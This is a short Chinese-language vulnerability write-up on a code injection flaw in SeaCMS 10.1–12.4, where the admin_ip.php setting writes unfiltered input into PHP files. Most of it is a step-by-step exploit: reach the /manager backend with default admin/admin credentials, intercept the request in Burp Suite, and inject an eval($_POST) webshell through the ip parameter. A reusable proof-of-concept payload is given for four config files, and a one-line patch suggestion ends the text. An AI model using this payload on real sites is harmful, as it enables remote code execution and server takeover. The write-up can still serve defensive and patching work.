在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限
seacms10.1-12.4
1.可直接尝试后台manager
2.使用Goby、AWVS、指纹识别类平台识别。
首先进入后台,地址为ip:端口/manager 默认用户名和密码admin/admin
进入后台之后,找到IP安全设置选项 目录为:admin_ip.php
打开Burp Suite工具,开始拦截数据包。
结尾添加webshell
";eval($_POST[password]);//
/data/admin/notify.php
/data/admin/ip.php
/data/admin/ping.php
/data/admin/weixin.php
以上四处存在代码执行情况通用POC:
v=0&ip=+1111111";eval($_POST['cmd']);//
保存后会直接执行。
升级、打补丁